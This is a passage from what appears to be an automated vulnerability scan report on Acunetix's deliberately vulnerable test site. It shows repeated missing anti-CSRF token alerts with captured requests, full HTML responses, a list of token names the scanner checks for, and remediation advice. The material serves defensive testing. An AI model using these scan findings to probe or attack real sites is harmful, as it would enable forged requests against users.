          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        21. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Content-Length: 3745
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3745 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 17859
          
          
          Response body (17859 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        22. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+IHWQJk8lQv/gFjjcBT7DDZEugHw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
